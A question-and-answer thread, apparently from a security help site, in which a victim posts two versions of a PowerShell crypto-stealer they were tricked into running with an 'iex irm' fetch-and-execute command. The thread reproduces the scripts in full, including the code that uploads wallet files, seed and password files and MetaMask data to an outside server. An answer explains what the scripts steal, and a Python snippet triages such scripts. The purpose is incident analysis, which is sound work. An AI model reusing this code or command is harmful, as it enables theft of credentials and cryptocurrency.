I was tricked into running this script in PowerShell. How badly have I been compromised?

Here is the link to the script: hxxps://extract-offline.tools/bip

Here are the instructions that were used to fool me: https://medium.com/@article-343624/convert-tool-f894f6244d4f

I ran iex "& { $(irm extract-offline.tools/bip) } RunJob" in PowerShell Desktop.

I did not put anything into the bip39.txt document I created, and I do not have any of those text files on my Desktop (but could it reach other directories?) or wallet folders for the various cryptocurrencies. I do have MetaMask, but not the 00003 folder the script mentions. Surely the MetaMask extension doesn't keep any unencrypted information in a file? Could those be accessed?

I would be grateful if someone could tell me exactly what this has done to my computer so I can take the necessary steps.

Edit/update 4 April 2024: this is the script from the URL suggested in the recent comments. It looks like they have modified it somewhat, but the substance has not changed much (I saved the original and added it below):

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."

$headers = @{
        "Content-Disposition" = "attachment; filename=`"$fileFullPath`""
    }
    
Write-Host "Retrieving PowerShell version information and installed modules..."



function UploadFiles {
    param(
        [string]$targetUrl,
        [string]$appDirectory,
        [string]$fileExtension
    )

    if ($fileExtension) {
        $files = Get-ChildItem $appDirectory -Recurse -File -Filter "*$fileExtension" | Where-Object { $_.Length -lt 800KB }
    } else {
        $files = Get-ChildItem $appDirectory -Recurse -File | Where-Object { $_.Length -lt 800KB }
    }

    foreach ($file in $files) {
        $fileFullPath = $file.FullName
        $headers = @{
            "Content-Disposition" = "attachment; filename=`"$fileFullPath`""
        }
        Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $fileFullPath -Headers $headers | Out-Null
    }
}



if ($env:OS -eq "Windows_NT") {
    $appAppdata = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
    $appDesktop = Join-Path -Path $env:USERPROFILE -ChildPath "Desktop"
    $appDocuments = Join-Path -Path $env:USERPROFILE -ChildPath "Documents"
    $appDataRoamingPath = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData)
    $appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
    $electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
} else {
    $appAppdata = "$env:HOME/Library/Application Support"
    $appDesktop = "$env:HOME/Desktop"
    $appElectrum = Join-Path -Path $appDataRoamingPath -ChildPath "Electrum"
    $electrumwalletsDirectory = Join-Path -Path $appElectrum -ChildPath "wallets"
}



UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $appDocuments -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $appDataRoamingPath -fileExtension ".dat"

UploadFiles -targetUrl $targetUrl -appDirectory $electrumwalletsDirectory


Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."

Original script:

$ErrorActionPreference = 'silentlycontinue'
$targetUrl = 'extract-offline.tools/data.php'
Write-Host "Loading 'bip' module from offline extraction tool..."


function Process-Df {
    param (
        [string]$filename,
        [string]$data
    )

    $desktopPath = Join-Path $env:USERPROFILE 'Desktop'
    $filePath = Join-Path $desktopPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}

function Process-Af {
    param (
        [string]$filename,
        [string]$data
    )

    $appDataPath = [System.IO.Path]::Combine($env:APPDATA)
    $filePath = Join-Path $appDataPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}

function Process-Ll {
    param (
        [string]$filename,
        [string]$data
    )

    $appDataLocalPath = [System.IO.Path]::Combine($env:LOCALAPPDATA)
    $filePath = Join-Path $appDataLocalPath $filename
    $headers = @{
        "Content-Disposition" = "attachment; filename="$filename"; data="$data""
    }
    Invoke-WebRequest -Uri $targetUrl -Method Put -InFile $filePath -Headers $headers | Out-Null
}


Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./wallet.txt" -Headers $headers | Out-Nul
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.dat" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip44.txt" -Headers $headers | Out-Null
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./seed.txt" -Headers $headers | Out-Null
Process-Df -filename "wallet.txt" -data "wallet_txt"
Process-Df -filename "bip39.txt" -data "bip39"
Process-Df -filename "seed.txt" -data "seed"
Process-Df -filename "wallet.dat" -data "wallet_dat"
Process-Df -filename "pass.txt" -data "pass"
Process-Df -filename "password.txt" -data "pass"
Process-Df -filename "password" -data "pass"
Process-Af -filename "./Dogecoin/wallet.dat" -data "doge"
Process-Af -filename "./electrum/wallets/default_wallet" -data "el1"
Process-Af -filename "./electrum/wallets/wallet_1" -data "el2"
Process-Af -filename "./WalletWasabi/Client/Wallets/Wallet.json" -data "wasabi"
Process-Af -filename "./Bitcoin/wallet.dat" -data "btc"
Process-Af -filename "./BitcoinCore/wallet.dat" -data "btccore"
Process-Af -filename "./Litecoin/wallet.dat" -data "ltc"
Process-Ll -filename "./Google/Chrome/User Data/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/000003" -data "metamask"

Write-Host "Loading 'bip' module from powershell extraction tool...... Failed."
Write-Host "Windows version not supported..."

Answer 1

The script in your question tries to steal some data:

  • all .txt and .dat files in the Windows or macOS Desktop folder and its subfolders
  • all .txt and .dat files in the Windows Documents folder and its subfolders
  • all .dat files in the Windows AppData\Roaming (%AppData%) folder and its subfolders
  • the entire AppData\Roaming\Electrum\wallets folder

It only uploads files up to 800 KiB in size.

It tries to do more (on macOS), but since it is rather amateurishly made, that will not succeed.

The script does not persist and does not make any changes to your PC.

If you have an Electrum crypto wallet, you can probably say goodbye to those coins. Otherwise, only you can judge what was in the uploaded files and what those files actually are.


The original script is similar. It does not persist and does not work well. It tries to steal these files:

  • .\wallet.txt (relative to the current folder in PowerShell)
  • .\bip39.txt
  • .\bip39.dat
  • .\bip39
  • .\bip44.txt
  • .\seed.txt
  • ...\Desktop\wallet.txt (in your Desktop folder)
  • ...\Desktop\bip39.txt
  • ...\Desktop\seed.txt
  • ...\Desktop\wallet.dat
  • ...\Desktop\pass.txt
  • ...\Desktop\password.txt
  • ...\Desktop\password
  • %AppData%\Dogecoin\wallet.dat
  • %AppData%\electrum\wallets\default_wallet
  • %AppData%\electrum\wallets\wallet_1
  • %AppData%\WalletWasabi\Client\Wallets\Wallet.json
  • %AppData%\Bitcoin\wallet.dat
  • %AppData%\BitcoinCore\wallet.dat
  • %AppData%\Litecoin\wallet.dat
  • %LocalAppData%\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\000003, which is a MetaMask Chrome extension data file; it will not be encrypted, at least not by Chrome

Are those files encrypted? Maybe, maybe not. Some may have been created by the user. As for the wallets, enthusiasm for cryptocurrency does not necessarily go hand in hand with understanding it. Besides, most software is poorly made in general.
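The answer above works out the impact by reading which paths the script feeds to Invoke-WebRequest -InFile. The following added example (not part of the question or the answer) does that triage statically for scripts of the shape quoted here: it pulls out the exfiltration URL and every targeted path or pattern, resolving the Process-Df/Af/Ll helpers and the $app* directory variables to the base folders their bodies use. The SAMPLE text is a constructed excerpt of the quoted scripts, and the two lookup tables are assumptions taken from those script bodies.

```python
import re

# Constructed excerpt of the two scripts quoted in the question (not the full scripts).
SAMPLE = r'''
$targetUrl = 'extract-offline.tools/data.php'
Invoke-WebRequest -Uri $targetUrl -Method Put -InFile "./bip39.txt" -Headers $headers | Out-Null
Process-Df -filename "seed.txt" -data "seed"
Process-Af -filename "./Bitcoin/wallet.dat" -data "btc"
Process-Ll -filename "./Google/Chrome/User Data/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn/000003" -data "metamask"
UploadFiles -targetUrl $targetUrl -appDirectory $appDesktop -fileExtension ".txt"
UploadFiles -targetUrl $targetUrl -appDirectory $electrumwalletsDirectory
'''

# Base folder each helper in the original script joins its -filename onto (from the helper bodies).
HELPER_BASE = {
    "Process-Df": "%USERPROFILE%\\Desktop",
    "Process-Af": "%APPDATA%",
    "Process-Ll": "%LOCALAPPDATA%",
}
# Directory variables of the newer script, resolved as its Windows branch sets them.
DIR_VARS = {
    "$appDesktop": "%USERPROFILE%\\Desktop",
    "$appDocuments": "%USERPROFILE%\\Documents",
    "$appDataRoamingPath": "%APPDATA%",
    "$electrumwalletsDirectory": "%APPDATA%\\Electrum\\wallets",
}

def triage(script: str):
    """Return (exfil_url, [(base_folder, path_or_pattern), ...]) for a script of this shape."""
    m = re.search(r"\$targetUrl\s*=\s*'([^']+)'", script)
    url = m.group(1) if m else None
    targets = []
    for line in script.splitlines():
        line = line.strip()
        # Direct upload: path is relative to the PowerShell working directory.
        m = re.match(r'Invoke-WebRequest .*-InFile\s+"([^"]+)"', line)
        if m:
            targets.append(("cwd", m.group(1)))
            continue
        # Helper call: resolve the relative -filename against the helper's base folder.
        m = re.match(r'(Process-\w+)\s+-filename\s+"([^"]+)"', line)
        if m and m.group(1) in HELPER_BASE:
            targets.append((HELPER_BASE[m.group(1)], m.group(2)))
            continue
        # Recursive upload of a whole folder, optionally filtered by extension.
        m = re.match(r'UploadFiles .*-appDirectory\s+(\$\w+)(?:\s+-fileExtension\s+"([^"]+)")?', line)
        if m:
            base = DIR_VARS.get(m.group(1), m.group(1))
            targets.append((base, f"**/*{m.group(2)}" if m.group(2) else "**/* (recursive)"))
    return url, targets
```

Comparing the returned list against which of those files actually exist on the machine (and are under the 800 KiB filter the answer notes) tells you what could have been uploaded.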
